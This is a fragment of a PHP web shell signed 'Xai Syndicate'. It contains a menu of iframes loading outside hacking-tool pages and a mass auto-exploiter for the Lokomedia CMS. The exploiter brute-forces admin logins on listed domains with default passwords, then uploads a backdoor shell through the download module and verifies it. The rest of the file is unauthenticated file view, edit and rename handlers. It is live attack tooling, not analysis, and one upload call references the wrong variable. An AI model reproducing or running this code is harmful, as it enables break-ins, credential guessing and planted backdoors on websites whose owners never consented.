        echo "<iframe src='http://pertolonganpertama.com/sqli.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";

} elseif($_GET['xai'] == 'tvon') {
        echo "<iframe src='http://pertolonganpertama.com/tvon.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";

} elseif($_GET['xai'] == 'bing') {
        echo "<iframe src='http://pertolonganpertama.com/bing.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";

} elseif($_GET['xai'] == 'pretashopa') {
        echo "<iframe src='http://pertolonganpertama.com/pretashopa.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";

} elseif($_GET['xai'] == 'twitter') {
        echo "<iframe src='http://pertolonganpertama.com/twitter.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";

} elseif($_GET['xai'] == 'contac') {
        echo "<iframe src='http://pertolonganpertama.com/contac.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
} elseif($_GET['xai'] == 'blog') {
        echo "<iframe src='http://www.loscardosmandoza.cf/' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
} elseif($_GET['xai'] == 'mirrorh') {
        echo "<iframe src='http://www.mirror-h.org/mass' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
} elseif($_GET['xai'] == 'tools') {
        echo "<iframe src='http://pertolonganpertama.com//' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
} elseif($_GET['xai'] == 'drupal') {
        echo "<iframe src='http://pertolonganpertama.com/drupal.php//' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
	} elseif($_GET['xai'] == 'lokomedia') {
	function cek($url) {
	$ch = curl_init($url);
		  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
		  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
	$res = curl_exec($ch);
		  curl_close($ch);
	return $res;
}
function curl($url,$payload) {
	$ch = curl_init($url);
		  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
		  curl_setopt($ch, CURLOPT_POST, true);
		  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
		  curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
		  curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
		  curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
	$res = curl_exec($ch);
		  curl_close($ch);
	return $res;
}
	echo "<center>
	<h1>&#x4c;&#x6f;&#x6b;&#x6f;&#x6d;&#x65;&#x64;&#x69;&#x61;&#x20;&#x41;&#x75;&#x74;&#x6f;&#x20;&#x54;&#x61;&#x6e;&#x61;&#x6d;&#x20;&#x53;&#x68;&#x65;&#x6c;&#x6c;</h1>
	<form method='post'>
	Domain: <br>
	<textarea placeholder='&#x68;&#x74;&#x74;&#x70;&#x3a;&#x2f;&#x2f;&#x77;&#x77;&#x77;&#x2e;&#x74;&#x61;&#x72;&#x67;&#x65;&#x74;&#x2e;&#x63;&#x6f;&#x6d;&#x2f;' name='url' style='width: 500px; height: 250px;'></textarea><br>
	<input type='submit' name='hajar' value='&#x5909;&#x4f53;'>
	</form>";
if($_POST['hajar']) {
	$domain = explode("\r\n", $_POST['url']);
	$up = array(
		"admin" => "admin",
		"admin" => "123456",
		"xai" => "xaixploit",
		"admin" => "admin12345",
		"admin" => "admin123",
		"direktur" => "admin",
		);
	foreach($domain as $url) {
		foreach($up as $user => $pass) {
			$data1 = array(
				"username" => $user,
				"password" => $pass,
				);
			$login = curl($url."/adminweb/cek_login.php", $data1);
			if(preg_match("/Logout|Administrator/", $login)) {
				$file = "shellmu.php"; //1 dir dengan exploiternyaa
				$data2 = array(
					"judul" => "xaishell auto exploiter lokomedia",
					"fupload" => "@$file",
					"upload" => " &nbsp;&nbsp;&nbsp;&nbsp; Simpan &nbsp;&nbsp;&nbsp;&nbsp;",
					);
				$ngirim = curl($url."/adminweb/modul/mod_download/aksi_download.php?module=download&act=input",$data);
				if(preg_match("/xaixploit auto exploiter lokomedia/i", $ngirim)) {
					echo "[+] $url -> <font color=green>sukses login [ user: $user pass: $pass ]</font><br>";
					$cek = cek("$url/files/image.php");
					if(preg_match("/xaixploit/", $cek)) {
						echo "[+] $url/files/image.php -> <font color=green>shelmu.</font><br><br>";
					} else {
						echo "[-] <font color='#bb0000'>shellmu gaada.</font><br><br>";
					}
				}
			} else {
				echo "[-] $url -> gagal login<br><br>";
			}
		}
	}
}
} elseif($_GET['act'] == 'view') {
	echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
	echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
} elseif($_GET['act'] == 'edit') {
	if($_POST['save']) {
		$save = file_put_contents($_GET['file'], $_POST['src']);
		if($save) {
			$act = "<font color=lime>Saved!</font>";
		} else {
			$act = "<font color=red>permission denied</font>";
		}
	echo "".$act."<br>";
	}
	echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
	echo "<form method='post'>
	<textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
	<input type='submit' value='Save' name='save' style='width: 500px;'>
	</form>";
} elseif($_GET['act'] == 'rename') {
	if($_POST['do_rename']) {
		$rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
		if($rename) {
			$act = "<script>window.location='?dir=".$dir."';</script>";
		} else {
			$act = "<font color=red>permission denied</font>";
		}
	echo "".$act."<br>";
	}
	echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
	echo "<form method='post'>
	<input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
	<input type='submit' name='do_rename' value='rename'>
	</form>";


		echo "</table>";
		if(!is_readable($dir)) {
			//
		} else {
			echo "<hr>";
		}

}
?>
<style>
html,body{margin:0;padding:0;height:100%;font:13px Arial;}
#wrapper{min-height:100%;position:relative;}
#header{background:#f0f0f0;padding:5px;height:50px;color:#3000ff;}
#body{padding-bottom:200px;padding-left:10px;}
#footer{background:#f0f0f0;position:absolute;bottom:0;width:100%;
   text-align:center;color:#408080;}
</style>
</head>
<body>

 <div id="footer" color=Red size=3><b>Copyright &copy 2016 - Xai Syndicate<br></p></div>

 <div id="footer" color=Red size=3><b>All Rights Reserved.</></div>
</font>
</body>
</head>
</html>